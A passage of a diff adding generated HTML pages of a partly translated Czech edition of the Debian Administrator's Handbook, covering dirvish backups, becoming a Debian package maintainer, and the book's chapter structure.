+                class="command">dirvish-expire</code> to do its job. In reality, the expiration rules are applied when creating a new backup copy to define the expiration date associated with that copy. <code
+                class="command">dirvish-expire</code> simply peruses the stored copies and deletes those for which the expiration date has passed.
+			</div></div><div
+            class="example"><a
+              xmlns=""
+              id="example.dirvish-vault"></a><p
+              class="title"><strong>Příklad 9.4. The <code
+                  class="filename">/backup/root/dirvish/default.conf</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">client: rivendell.falcot.com
+tree: /
+xdev: 1
+index: gzip
+image-default: %Y%m%d
+exclude:
+    /var/cache/apt/archives/*.deb
+    /var/cache/man/**
+    /tmp/**
+    /var/tmp/**
+    *.bak
+</pre></div></div><div
+            class="para">
+				The above example specifies the set of files to back up: these are files on the machine <span
+              class="emphasis"><em>rivendell.falcot.com</em></span> (for local data backup, simply specify the name of the local machine as indicated by <code
+              class="command">hostname</code>), especially those in the root tree (<code
+              class="literal">tree: /</code>), except those listed in <code
+              class="literal">exclude</code>. The backup will be limited to the contents of one filesystem (<code
+              class="literal">xdev: 1</code>). It will not include files from other mount points. An index of saved files will be generated (<code
+              class="literal">index: gzip</code>), and the image will be named according to the current date (<code
+              class="literal">image-default: %Y%m%d</code>).
+			</div><div
+            class="para">
+				There are many options available, all documented in the <span
+              class="citerefentry"><span
+                class="refentrytitle">dirvish.conf</span>(5)</span> manual page. Once these configuration files are setup, you have to initialize each file set with the <code
+              class="command">dirvish --vault <em
+                class="replaceable">vault</em> --init</code> command. From there on the daily invocation of <code
+              class="command">dirvish-runall</code> will automatically create a new backup copy just after having deleted those that expired.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> Remote backup over SSH</strong></p></div></div></div><div
+              class="para">
+				When dirvish needs to save data to a remote machine, it will use <code
+                class="command">ssh</code> to connect to it, and will start <code
+                class="command">rsync</code> as a server. This requires the root user to be able to automatically connect to it. The use of an SSH authentication key allows precisely that (see <a
+                class="xref"
+                href="sect.remote-login.html#sect.ssh-key-based-auth">9.2.1.1 – „Key-Based Authentication“</a>).
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.12.13.12"></a>9.10.2. Restoring Machines without Backups</h3></div></div></div><div
+            class="para">
+				Desktop computers, which are not backed up, will be easy to reinstall from custom DVD-ROMs prepared with <span
+              class="emphasis"><em>Simple-CDD</em></span> (see <a
+              class="xref"
+              href="sect.automated-installation.html#sect.simple-cdd">12.3.3 – „Simple-CDD: The All-In-One Solution“</a>). Since this performs an installation from scratch, it loses any customization that can have been made after the initial installation. This is fine since the systems are all hooked to a central LDAP directory for accounts and most desktop applications are preconfigured thanks to dconf (see <a
+              class="xref"
+              href="sect.graphical-desktops.html#sect.gnome-desktop">13.3.1 – „GNOME“</a> for more information about this).
+			</div><div
+            class="para">
+				The Falcot Corp administrators are aware of the limits in their backup policy. Since they can't protect the backup server as well as a tape in a fireproof safe, they have installed it in a separate room so that a disaster such as a fire in the server room won't destroy backups along with everything else. Furthermore, they do an incremental backup on DVD-ROM once per week — only files that have been modified since the last backup are included.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Backing up SQL and LDAP services</strong></p></div></div></div><div
+              class="para">
+				Many services (such as SQL or LDAP databases) cannot be backed up by simply copying their files (unless they are properly interrupted during creation of the backups, which is frequently problematic, since they are intended to be available at all times). As such, it is necessary to use an “export” mechanism to create a “data dump” that can be safely backed up. These are often quite large, but they compress well. To reduce the storage space required, you will only store a complete text file per week, and a <code
+                class="command">diff</code> each day, which is created with a command of the type <code
+                class="command">diff <em
+                  class="replaceable">file_from_yesterday</em> <em
+                  class="replaceable">file_from_today</em></code>. The <code
+                class="command">xdelta</code> program produces incremental differences from binary dumps.
+			</div><a
+              id="id-1.12.13.12.4.3"
+              class="indexterm"></a><a
+              id="id-1.12.13.12.4.4"
+              class="indexterm"></a><a
+              id="id-1.12.13.12.4.5"
+              class="indexterm"></a></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> <span
+                        class="emphasis"><em>TAR</em></span>, the standard for tape backups</strong></p></div></div></div><a
+              id="id-1.12.13.12.5.2"
+              class="indexterm"></a><a
+              id="id-1.12.13.12.5.3"
+              class="indexterm"></a><a
+              id="id-1.12.13.12.5.4"
+              class="indexterm"></a><div
+              class="para">
+				Historically, the simplest means of making a backup on Unix was to store a <span
+                class="emphasis"><em>TAR</em></span> archive on a tape. The <code
+                class="command">tar</code> command even got its name from “Tape ARchive”.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.quotas.html"><strong>Předcházející</strong>9.9. Quotas</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.hotplug.html"><strong>Další</strong>9.11. Hot Plugging: hotplug</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.becoming-package-maintainer.html b/tmp/cs-CZ/html/sect.becoming-package-maintainer.html
new file mode 100644
index 000000000..d8b12262f
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.becoming-package-maintainer.html
@@ -0,0 +1,386 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">15.4. Becoming a Package Maintainer</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Backport, Rebuild, Source package, Archive, Meta-package, Debian Developer, Maintainer" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="debian-packaging.html"
+        title="Kapitola 15. Creating a Debian Package" /><link
+        rel="prev"
+        href="sect.setup-apt-package-repository.html"
+        title="15.3. Creating a Package Repository for APT" /><link
+        rel="next"
+        href="conclusion.html"
+        title="Kapitola 16. Conclusion: Debian's Future" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.becoming-package-maintainer.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.setup-apt-package-repository.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="conclusion.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.becoming-package-maintainer"></a>15.4. Becoming a Package Maintainer</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.18.7.2"></a>15.4.1. Learning to Make Packages</h3></div></div></div><div
+            class="para">
+				Creating a quality Debian package is not always a simple task, and becoming a package maintainer takes some learning, both with theory and practice. It's not a simple matter of building and installing software; rather, the bulk of the complexity comes from understanding the problems and conflicts, and more generally the interactions, with the myriad of other packages available.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.7.2.3"></a>15.4.1.1. Rules</h4></div></div></div><div
+              class="para">
+					A Debian package must comply with the precise rules compiled in the Debian policy, and each package maintainer must know them. There is no requirement to know them by heart, but rather to know they exist and to refer to them whenever a choice presents a non-trivial alternative. Every Debian maintainer has made mistakes by not knowing about a rule, but this is not a huge problem as long as the error gets fixed when a user reports it as a bug report (which tends to happen fairly soon thanks to advanced users). <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.debian.org/doc/debian-policy/">https://www.debian.org/doc/debian-policy/</a></div>
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.7.2.4"></a>15.4.1.2. Procedures</h4></div></div></div><a
+              id="id-1.18.7.2.4.2"
+              class="indexterm"></a><div
+              class="para">
+					Debian is not a simple collection of individual packages. Everyone's packaging work is part of a collective project; being a Debian developer involves knowing how the Debian project operates as a whole. Every developer will, sooner or later, interact with others. The Debian Developer's Reference (in the <span
+                class="pkg pkg">developers-reference</span> package) summarizes what every developer must know in order to interact as smoothly as possible with the various teams within the project, and to take the best possible advantages of the available resources. This document also enumerates a number of duties a developer is expected to fulfill. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.debian.org/doc/manuals/developers-reference/">https://www.debian.org/doc/manuals/developers-reference/</a></div>
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.7.2.5"></a>15.4.1.3. Tools</h4></div></div></div><div
+              class="para">
+					Many tools help package maintainers in their work. This section describes them quickly, but does not give the full details, since they all have comprehensive documentation of their own.
+				</div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.18.7.2.5.3"></a>15.4.1.3.1. The <code
+                        class="command">lintian</code> Program</h5></div></div></div><a
+                id="id-1.18.7.2.5.3.2"
+                class="indexterm"></a><div
+                class="para">
+						This tool is one of the most important: it's the Debian package checker. It is based on a large array of tests created from the Debian policy, and detects quickly and automatically many errors that can then be fixed before packages are released.
+					</div><div
+                class="para">
+						This tool is only a helper, and it sometimes gets it wrong (for instance, since the Debian policy changes over time, <code
+                  class="command">lintian</code> is sometimes outdated). It is also not exhaustive: not getting any Lintian error should not be interpreted as a proof that the package is perfect; at most, it avoids the most common errors.
+					</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.18.7.2.5.4"></a>15.4.1.3.2. The <code
+                        class="command">piuparts</code> Program</h5></div></div></div><a
+                id="id-1.18.7.2.5.4.2"
+                class="indexterm"></a><div
+                class="para">
+						This is another important tool: it automates the installation, upgrade, removal and purge of a package (in an isolated environment), and checks that none of these operations leads to an error. It can help in detecting missing dependencies, and it also detects when files are incorrectly left over after the package got purged.
+					</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.18.7.2.5.5"></a>15.4.1.3.3. devscripts</h5></div></div></div><a
+                id="id-1.18.7.2.5.5.2"
+                class="indexterm"></a><a
+                id="id-1.18.7.2.5.5.3"
+                class="indexterm"></a><a
+                id="id-1.18.7.2.5.5.4"
+                class="indexterm"></a><a
+                id="id-1.18.7.2.5.5.5"
+                class="indexterm"></a><a
+                id="id-1.18.7.2.5.5.6"
+                class="indexterm"></a><a
+                id="id-1.18.7.2.5.5.7"
+                class="indexterm"></a><div
+                class="para">
+						The <span
+                  class="pkg pkg">devscripts</span> package contains many programs helping with a wide array of a Debian developer's job:
+					</div><div
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="itemizedlist"><ul><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">debuild</code> allows generating a package (with <code
+                        class="command">dpkg-buildpackage</code>) and running <code
+                        class="command">lintian</code> to check its compliance with the Debian policy afterwards.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">debclean</code> cleans a source package after a binary package has been generated.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">dch</code> allows quick and easy editing of a <code
+                        class="filename">debian/changelog</code> file in a source package.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">uscan</code> checks whether a new version of a software has been released by the upstream author; this requires a <code
+                        class="filename">debian/watch</code> file with a description of the location of such releases.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">debi</code> allows installing (with <code
+                        class="command">dpkg -i</code>) the Debian package that was just generated without the need to type its full name and path.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								In a similar fashion, <code
+                        class="command">debc</code> allows scanning the contents of the recently-generated package (with <code
+                        class="command">dpkg -c</code>), without needing to type its full name and path.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">bts</code> controls the bug tracking system from the command line; this program automatically generates the appropriate emails.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">debrelease</code> uploads a recently-generated package to a remote server, without needing to type the full name and path of the related <code
+                        class="filename">.changes</code> file.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">debsign</code> signs the <code
+                        class="filename">*.dsc</code> and <code
+                        class="filename">*.changes</code> files.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">uupdate</code> automates the creation of a new revision of a package when a new upstream version has been released.
+							</div></li></ul></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.18.7.2.5.6"></a>15.4.1.3.4. <span
+                        class="pkg pkg">debhelper</span> and <span
+                        class="pkg pkg">dh-make</span></h5></div></div></div><a
+                id="id-1.18.7.2.5.6.2"
+                class="indexterm"></a><a
+                id="id-1.18.7.2.5.6.3"
+                class="indexterm"></a><div
+                class="para">
+						Debhelper is a set of scripts easing the creation of policy-compliant packages; these scripts are invoked from <code
+                  class="filename">debian/rules</code>. Debhelper has been widely adopted within Debian, as evidenced by the fact that it is used by the majority of official Debian packages. All the commands it contains have a <code
+                  class="command">dh_</code> prefix.
+					</div><div
+                class="para">
+						The <code
+                  class="command">dh_make</code> script (in the <span
+                  class="emphasis"><em>dh-make</em></span> package) creates files required for generating a Debian package in a directory initially containing the sources for a piece of software. As can be guessed from the name of the program, the generated files use debhelper by default.
+					</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.18.7.2.5.7"></a>15.4.1.3.5. <code
+                        class="command">dupload</code> and <code
+                        class="command">dput</code></h5></div></div></div><a
+                id="id-1.18.7.2.5.7.2"
+                class="indexterm"></a><a
+                id="id-1.18.7.2.5.7.3"
+                class="indexterm"></a><div
+                class="para">
+						The <code
+                  class="command">dupload</code> and <code
+                  class="command">dput</code> commands allow uploading a Debian package to a (possibly remote) server. This allows developers to publish their package on the main Debian server (<code
+                  class="literal">ftp-master.debian.org</code>) so that it can be integrated to the archive and distributed by mirrors. These commands take a <code
+                  class="filename">*.changes</code> file as a parameter, and deduce the other relevant files from its contents.
+					</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.18.7.3"></a>15.4.2. Acceptance Process</h3></div></div></div><div
+            class="para">
+				Becoming a “Debian developer” is not a simple administrative matter. The process comprises several steps, and is as much an initiation as it is a selection process. In any case, it is formalized and well-documented, so anyone can track their progression on the website dedicated to the new member process. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://nm.debian.org/">https://nm.debian.org/</a></div>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>EXTRA</em></span> Lightweight process for “Debian Maintainers”</strong></p></div></div></div><div
+              class="para">
+				“Debian Maintainer” is another status that gives less privileges than “Debian developer” but whose associated process is quicker. With this status, the contributors can maintain their own packages only. A Debian developer only needs to perform a check on an initial upload, and issue a statement to the effect that they trust the prospective maintainer with the ability to maintain the package on their own.
+			</div><a
+              id="id-1.18.7.3.3.3"
+              class="indexterm"></a></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.7.3.4"></a>15.4.2.1. Prerequisites</h4></div></div></div><div
+              class="para">
+					All candidates are expected to have at least a working knowledge of the English language. This is required at all levels: for the initial communications with the examiner, of course, but also later, since English is the preferred language for most of the documentation; also, package users will be communicating in English when reporting bugs, and they will expect replies in English.
+				</div><div
+              class="para">
+					The other prerequisite deals with motivation. Becoming a Debian developer is a process that only makes sense if the candidate knows that their interest in Debian will last for many months. The acceptance process itself may last for several months, and Debian needs developers for the long haul; each package needs permanent maintenance, and not just an initial upload.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.7.3.5"></a>15.4.2.2. Registration</h4></div></div></div><div
+              class="para">
+					The first (real) step consists in finding a sponsor or advocate; this means an official developer willing to state that they believe that accepting <span
+                class="emphasis"><em>X</em></span> would be a good thing for Debian. This usually implies that the candidate has already been active within the community, and that their work has been appreciated. If the candidate is shy and their work is not publicly touted, they can try to convince a Debian developer to advocate them by showing their work in a private way.
+				</div><a
+              id="id-1.18.7.3.5.3"
+              class="indexterm"></a><div
+              class="para">
+					At the same time, the candidate must generate a public/private RSA key pair with GnuPG, which should be signed by at least two official Debian developers. The signature authenticates the name on the key. Effectively, during a key signing party, each participant must show an official identification (usually an ID card or passport) together with their key identifiers. This step confirms the link between the human and the keys. This signature thus requires meeting in real life. If you have not yet met any Debian developers in a public free software conference, you can explicitly seek developers living nearby using the list on the following webpage as a starting point. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://wiki.debian.org/Keysigning">https://wiki.debian.org/Keysigning</a></div>
+				</div><div
+              class="para">
+					Once the registration on <code
+                class="literal">nm.debian.org</code> has been validated by the advocate, an <span
+                class="emphasis"><em>Application Manager</em></span> is assigned to the candidate. The application manager will then drive the process through multiple pre-defined steps and checks.
+				</div><div
+              class="para">
+					The first verification is an identity check. If you already have a key signed by two Debian developers, this step is easy; otherwise, the application manager will try and guide you in your search for Debian developers close by to organize a meet-up and a key signing.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.7.3.6"></a>15.4.2.3. Accepting the Principles</h4></div></div></div><div
+              class="para">
+					These administrative formalities are followed by philosophical considerations. The point is to make sure that the candidate understands and accepts the social contract and the principles behind Free Software. Joining Debian is only possible if one shares the values that unite the current developers, as expressed in the founding texts (and summarized in <a
+                class="xref"
+                href="the-debian-project.html">1 – „<em>Projekt Debian</em>“</a>).
+				</div><div
+              class="para">
+					In addition, each candidate wishing to join the Debian ranks is expected to know the workings of the project, and how to interact appropriately to solve the problems they will doubtless encounter as time passes. All of this information is generally documented in manuals targeting the new maintainers, and in the Debian developer's reference. An attentive reading of this document should be enough to answer the examiner's questions. If the answers are not satisfactory, the candidate will be informed. They will then have to read (again) the relevant documentation before trying again. In the cases where the existing documentation does not contain the appropriate answer for the question, the candidate can usually reach an answer with some practical experience within Debian, or potentially by discussing with other Debian developers. This mechanism ensures that candidates get involved somewhat in Debian before becoming a full part of it. It is a deliberate policy, by which candidates who eventually join the project are integrated as another piece of an infinitely extensible jigsaw puzzle.
+				</div><a
+              id="id-1.18.7.3.6.4"
+              class="indexterm"></a><div
+              class="para">
+					This step is usually known as the <span
+                class="emphasis"><em>Philosophy &amp; Procedures</em></span> (P&amp;P for short) in the lingo of the developers involved in the new member process.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.7.3.7"></a>15.4.2.4. Checking Skills</h4></div></div></div><div
+              class="para">
+					Each application to become an official Debian developer must be justified. Becoming a project member requires showing that this status is legitimate, and that it facilitates the candidate's job in helping Debian. The most common justification is that being granted Debian developer status eases maintenance of a Debian package, but it is not the only one. Some developers join the project to contribute to porting to a specific architecture, others want to improve documentation, and so on.
+				</div><div
+              class="para">
+					This step represents the opportunity for the candidate to state what they intend to do within the Debian project and to show what they have already done towards that end. Debian is a pragmatic project and saying something is not enough, if the actions do not match what is announced. Generally, when the intended role within the project is related to package maintenance, a first version of the prospective package will have to be validated technically and uploaded to the Debian servers by a sponsor among the existing Debian developers.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>COMMUNITY</em></span> Sponsoring</strong></p></div></div></div><a
+                id="id-1.18.7.3.7.4.2"
+                class="indexterm"></a><div
+                class="para">
+					Debian developers can “sponsor” packages prepared by someone else, meaning that they publish them in the official Debian repositories after having performed a careful review. This mechanism enables external persons, who have not yet gone through the new member process, to contribute occasionally to the project. At the same time, it ensures that all packages included in Debian have always been checked by an official member.
+				</div></div><div
+              class="para">
+					Finally, the examiner checks the candidate's technical (packaging) skills with a detailed questionnaire. Bad answers are not permitted, but the answer time is not limited. All the documentation is available and several tries are allowed if the first answers are not satisfactory. This step does not intend to discriminate, but to ensure at least a modicum of knowledge common to new contributors.
+				</div><a
+              id="id-1.18.7.3.7.6"
+              class="indexterm"></a><div
+              class="para">
+					This step is known as the <span
+                class="emphasis"><em>Tasks &amp; Skills</em></span> step (T&amp;S for short) in the examiners' jargon.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.7.3.8"></a>15.4.2.5. Final Approval</h4></div></div></div><div
+              class="para">
+					At the very last step, the whole process is reviewed by a DAM (<span
+                class="emphasis"><em>Debian Account Manager</em></span>). The DAM will review all the information about the candidate that the examiner collected, and makes the decision on whether or not to create an account on the Debian servers. In cases where extra information is required, the account creation may be delayed. Refusals are rather rare if the examiner does a good job of following the process, but they sometimes happen. They are never permanent, and the candidate is free to try again at a later time.
+				</div><div
+              class="para">
+					The DAM's decision is authoritative and (almost) without appeal, which explains why the people in that seat have often been criticized in the past.
+				</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.setup-apt-package-repository.html"><strong>Předcházející</strong>15.3. Creating a Package Repository for APT</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="conclusion.html"><strong>Další</strong>Kapitola 16. Conclusion: Debian's Future</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.book-structure.html b/tmp/cs-CZ/html/sect.book-structure.html
new file mode 100644
index 000000000..cce8024bf
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.book-structure.html
@@ -0,0 +1,184 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">4. truktura knihy</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="foreword.html"
+        title="Předmluva" /><link
+        rel="prev"
+        href="sect.selected-approach.html"
+        title="3. Obecný přístup" /><link
+        rel="next"
+        href="sect.acknowledgments.html"
+        title="5. Poděkování" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.book-structure.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.selected-approach.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.acknowledgments.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.book-structure"></a>4. truktura knihy</h2></div></div></div><div
+          class="para">
+			This book is built around a case study providing both support and illustration for all topics being addressed.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>POZNÁMKA</em></span> Webové stránky, emaily autorů</strong></p></div></div></div><div
+            class="para">
+			Tato kniha má své vlastní webové stránky, které obsahují různé užitečné prvky. Zejména obsahují online verzi knihy s odkazy na kliknutí, a případné chyby. Neváhejte si je prohlédnut a nechat nám nějakou zpětnou vazbu. Rádi si přečteme vaše komentáře nebo zprávy. Pošlete je e-mailem na <code
+              class="email"><a
+                class="email"
+                href="mailto:hertzog@debian.org">hertzog@debian.org</a></code> (Raphaël) a <code
+              class="email"><a
+                class="email"
+                href="mailto:lolando@debian.org">lolando@debian.org</a></code> (Roland).<div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://debian-handbook.info/">http://debian-handbook.info/</a></div>
+		</div></div><div
+          class="para">
+			<span
+            class="strong strong"><strong>Kapitola 1</strong></span> se zaměřuje na netechnickou prezentaci projektu Debian a popisuje její cíle a organizaci. Tyto aspekty jsou důležité, protože definují obecný rámec, který další kapitoly doplní konkrétnějšími informacemi.
+		</div><div
+          class="para">
+			<span
+            class="strong strong"><strong>Kapitoly 2 a 3</strong></span> poskytují široký nástin případové studie. V tomto bodě by si mohli začínající čtenáři najít čas na čtení <span
+            class="strong strong"><strong>dodatku B</strong></span>, kde najdetou krátký doučovací kurz vysvětlující řadu základních počítačových pojmů, stejně jako koncepty vlastní jakémukoliv Unixovému systému.
+		</div><div
+          class="para">
+			Abychom se dostali k podstatě předmětu, zcela přirozeně začneme procesem instalace (<span
+            class="strong strong"><strong>Kapitola 4</strong></span>); <span
+            class="strong strong"><strong>kapitoly 5 a 6</strong></span> představí základní nástroje, které bude používat každý správce Debianu, jako jsou ty z rodiny <span
+            class="strong strong"><strong>APT</strong></span> , která je z velké části zodpovědná za vynikající reputaci distribuce. Tyto kapitoly nejsou nijak omezeny na profesionály, protože doma je každý svým vlastním administrátorem.
+		</div><div
+          class="para">
+			<span
+            class="strong strong"><strong>Kapitola 7</strong></span> bude důležitá vsuvka; Popisuje pracovní postupy k efektivnímu používání dokumentace a rychlému pochopení problémů, za účelem jejich vyřešení.
+		</div><div
+          class="para">
+			Následující kapitoly budou podrobnější prohlídkou systému, počínaje základní infrastrukturou a službami (<span
+            class="strong strong"><strong>kapitoly 8 až 10</strong></span>) a postupně se zásobníkem se dostaneme až k uživatelským aplikacím v <span
+            class="strong strong"><strong>kapitole 13</strong></span>. <span
+            class="strong strong"><strong>Kapitola 12</strong></span> se zabývá pokročilejšími předměty, které se nejvíce přímo týkají správců velkých souborů počítačů (včetně serverů), zatímco <span
+            class="strong strong"><strong>Kapitola 14</strong></span> je stručný úvod do širšího předmětu počítačové bezpečnosti a dává několik návodů, jak se vyhnout většině problémů.
+		</div><div
+          class="para">
+			<span
+            class="strong strong"><strong>Kapitola 15</strong></span> je pro administrátory, kteří chtějí jít dál a vytvořit si vlastní debianovské balíčky.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>Slovní zásoba</em></span> Balíček Debianu</strong></p></div></div></div><a
+            id="id-1.3.8.10.2"
+            class="indexterm"></a><a
+            id="id-1.3.8.10.3"
+            class="indexterm"></a><a
+            id="id-1.3.8.10.4"
+            class="indexterm"></a><a
+            id="id-1.3.8.10.5"
+            class="indexterm"></a><div
+            class="para">
+			Balíček Debianu je archiv obsahující všechny soubory potřebné k instalaci softwaru. Obvykle se jedná o soubor s příponou <code
+              class="filename">deb</code> , který lze zpracovat příkazem <code
+              class="command">dpkg</code>. Také nazývaný <span
+              class="emphasis"><em>binární balíček</em></span>obsahuje soubory, které lze přímo použít (například programy nebo dokumentace). Na druhou stranu <span
+              class="emphasis"><em>zdrojový balíček</em></span> obsahuje zdrojový kód pro software a pokyny potřebné pro sestavení binárního balíčku.
+		</div></div><div
+          class="para">
